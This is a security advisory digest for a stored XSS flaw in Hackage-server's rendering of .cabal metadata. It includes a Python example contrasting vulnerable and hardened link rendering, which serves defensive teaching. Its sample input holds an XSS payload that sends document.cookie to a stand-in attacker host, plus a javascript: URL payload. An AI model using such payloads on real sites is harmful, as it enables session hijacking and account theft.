CVE
CVE-2026-40472
CVSS 9.9
Daily digests
Hackage-server, the package repository for the Haskell ecosystem, renders user-supplied metadata from .cabal files straight into HTML links without escaping it. A malicious package maintainer can therefore plant a stored XSS payload in package metadata that executes in the browser of anyone who views the package page, which could expose the victim's session cookies or let the attacker perform actions as the victim. CVSS 9.9; not yet exploited in the wild.
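The bug class described above, as an added example that is not Hackage-server's own code: a simplified .cabal field parser feeds a package page renderer, once with the vulnerable "interpolate the metadata into the link" pattern and once with a hardened version that rejects non-http(s) URL schemes and HTML-encodes both the attribute and the link text. The field names (homepage, bug-reports), the constructed .cabal input and the payloads are illustrative assumptions; the advisory does not say which metadata field is affected.

```python
import html
from urllib.parse import urlsplit

# Constructed sample input (assumption): a minimal .cabal-style header in
# which a maintainer has placed XSS payloads in URL-bearing fields.
MALICIOUS_CABAL = """\
name:          demo-pkg
version:       0.1.0.0
synopsis:      Harmless looking package
homepage:      https://example.invalid/"><script>document.location='https://attacker.invalid/?c='+document.cookie</script>
bug-reports:   javascript:alert(document.domain)
"""

ALLOWED_SCHEMES = {"http", "https"}


def parse_cabal_fields(text):
    """Simplified 'field: value' parser; NOT the real Cabal grammar
    (continuation lines, sections and comments are ignored)."""
    fields = {}
    for line in text.splitlines():
        if ":" in line and not line[0].isspace():
            key, _, value = line.partition(":")
            fields[key.strip().lower()] = value.strip()
    return fields


def render_link_unsafe(label, url):
    # Vulnerable pattern: attacker-controlled metadata is interpolated
    # verbatim into an href attribute, so '">' breaks out of the attribute
    # and a javascript: URL survives as a clickable link.
    return f'<a href="{url}">{label}</a>'


def safe_url(url):
    """Return the URL if it uses an allowed scheme and has a host, else None."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return url


def render_link_safe(label, url):
    # Hardened pattern: allow-list the scheme, then encode for the attribute
    # context (quote=True also encodes " and ') and for the text context.
    checked = safe_url(url)
    if checked is None:
        # Unacceptable URL: show the label as plain text, emit no link.
        return html.escape(label, quote=True)
    return (f'<a href="{html.escape(checked, quote=True)}">'
            f'{html.escape(label, quote=True)}</a>')


def render_package_page(cabal_text, link_renderer):
    """Render the parts of a package page that carry maintainer-supplied URLs."""
    fields = parse_cabal_fields(cabal_text)
    parts = [f"<h1>{html.escape(fields.get('name', ''), quote=True)}</h1>"]
    for key in ("homepage", "bug-reports"):
        if key in fields:
            parts.append(link_renderer(key, fields[key]))
    return "\n".join(parts)


def contains_script_injection(page_html):
    """Crude detector: an unencoded <script tag anywhere in the output."""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    for name, renderer in (("unsafe", render_link_unsafe), ("safe", render_link_safe)):
        page = render_package_page(MALICIOUS_CABAL, renderer)
        print(f"--- {name} ---\n{page}\ninjected: {contains_script_injection(page)}\n")
```

The scheme allow-list matters as much as the encoding: attribute-encoding alone would still emit a well-formed `<a href="javascript:...">`, which fires on click rather than on page load but is still script running in the viewer's session. In a real renderer the encoding step belongs to an auto-escaping template layer rather than hand-written f-strings; the explicit calls here only make the two contexts visible.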